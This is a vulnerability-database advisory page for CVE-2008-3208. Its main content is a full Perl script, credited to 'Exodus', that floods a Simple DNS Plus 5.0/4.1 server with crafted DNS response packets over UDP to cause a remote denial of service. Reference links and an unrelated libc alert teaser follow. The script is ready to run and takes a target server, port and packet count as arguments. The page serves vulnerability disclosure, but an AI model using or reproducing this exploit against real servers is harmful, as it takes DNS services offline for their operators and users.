|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 4011 CVE : CVE-2008-3208 CWE : NVD-CWE-noinfo SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Given : Yes Credit : Exodus Published : 20.07.2008
Advisory Text : #!/usr/bin/perl # Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit # # usage: sdns-dos.pl <dns server> <dns source port> <num of packets> # Exploit written by Exodus. # http://www.blackhat.org.il use IO::Socket; if(@ARGV < 3){ print("sdns-dos.pl <dns server> <dns source port> <num of packets>"); } $sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server"); $address = $ARGV[0]; $trans = pack("H4","1337"); $flags = pack("B16","1000010110110000"); $question = pack("H4","0001"); $answerRR = pack("H4","0001"); $authorityRR = pack("H4","0000"); $additionlRR = pack("H4","0000"); $type = pack("H4","0001"); # A host name $class = pack("H4","0001"); # IN @parts = split(/\./,$address); foreach $part (@parts) { $packedlen = pack("H2",sprintf("%02x",length($part))); $address2 .= $packedlen.$part; } $query = $address2. "\000" . $type . $class; $aname = pack("H4","c00c"); $atype = pack("H4","0001"); $aclass = pack("H4","0001"); $ttl = pack("H8","0000008d"); $dlen = pack("H4","0004"); $addr = inet_aton("127.0.0.1"); $answer = $aname . $atype . $aclass . $ttl . $dlen . $addr; $payload = $trans . $flags . $question . $answerRR . $authorityRR . $additionlRR . $query . $answer; print "sending $ARGV[2] packetsā�¦ "; for($i=0;$i<=$ARGV[2];$i++) { print $sock $payload; } print "Done. Good bye."; __END__ References : http://xforce.iss.net/xforce/xfdb/43767 http://www.simpledns.com/kb.aspx?kbid=1246 http://www.securityfocus.com/bid/30207 http://www.securityfocus.com/archive/1/archive/1/494304/100/0/threaded http://www.milw0rm.com/exploits/6059 http://www.blackhat.org.il/index.php/simple-dns-plus-5041-remote-denial-of- service-exploit/ Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |